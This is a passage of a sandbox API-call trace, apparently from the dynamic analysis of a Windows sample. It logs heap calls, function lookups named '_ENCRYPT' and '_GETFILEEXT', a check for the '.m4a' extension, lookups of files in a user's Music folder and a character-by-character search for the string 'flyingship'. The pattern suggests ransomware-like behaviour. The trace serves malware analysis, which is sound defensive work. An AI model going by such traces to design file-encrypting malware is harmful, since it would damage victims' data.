Size=0x4) returned 0x8e1970 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.433] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0184.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.433] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0184.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.434] CloseHandle (hObject=0x138) returned 1 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0184.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.435] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.435] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0184.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0184.436] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.436] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0184.436] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.436] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0184.436] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0184.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.437] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0184.437] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.437] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0x90add8 [0184.439] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.439] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0x90add8 [0184.439] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.439] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 